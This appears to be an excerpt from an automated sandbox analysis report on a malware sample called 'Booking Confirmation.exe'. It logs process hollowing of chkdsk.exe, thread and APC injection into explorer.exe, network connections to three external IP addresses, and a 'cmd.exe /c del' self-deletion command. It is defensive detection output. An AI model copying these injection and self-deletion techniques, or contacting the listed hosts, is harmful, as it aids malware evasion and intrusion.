Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1513A mov eax, dword ptr fs:[00000030h]	8_2_04D1513A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1513A mov eax, dword ptr fs:[00000030h]	8_2_04D1513A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]	8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]	8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]	8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]	8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov ecx, dword ptr fs:[00000030h]	8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12ACB mov eax, dword ptr fs:[00000030h]	8_2_04D12ACB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12AE4 mov eax, dword ptr fs:[00000030h]	8_2_04D12AE4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1D294 mov eax, dword ptr fs:[00000030h]	8_2_04D1D294
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1D294 mov eax, dword ptr fs:[00000030h]	8_2_04D1D294
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1FAB0 mov eax, dword ptr fs:[00000030h]	8_2_04D1FAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]	8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]	8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]	8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]	8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]	8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFAAB0 mov eax, dword ptr fs:[00000030h]	8_2_04CFAAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFAAB0 mov eax, dword ptr fs:[00000030h]	8_2_04CFAAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D74257 mov eax, dword ptr fs:[00000030h]	8_2_04D74257
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]	8_2_04CE9240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]	8_2_04CE9240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]	8_2_04CE9240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]	8_2_04CE9240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAEA55 mov eax, dword ptr fs:[00000030h]	8_2_04DAEA55
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2927A mov eax, dword ptr fs:[00000030h]	8_2_04D2927A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D9B260 mov eax, dword ptr fs:[00000030h]	8_2_04D9B260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D9B260 mov eax, dword ptr fs:[00000030h]	8_2_04D9B260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8A62 mov eax, dword ptr fs:[00000030h]	8_2_04DB8A62
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF8A0A mov eax, dword ptr fs:[00000030h]	8_2_04CF8A0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D03A1C mov eax, dword ptr fs:[00000030h]	8_2_04D03A1C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAAA16 mov eax, dword ptr fs:[00000030h]	8_2_04DAAA16
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAAA16 mov eax, dword ptr fs:[00000030h]	8_2_04DAAA16
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEAA16 mov eax, dword ptr fs:[00000030h]	8_2_04CEAA16
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEAA16 mov eax, dword ptr fs:[00000030h]	8_2_04CEAA16

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 156.227.187.201 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.175.200.247 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.169.149.11 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 2E0000

Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000000.675063336.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.923187943.0000000005E50000.00000004.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.693941917.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Users\user\Desktop\Booking Confirmation.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
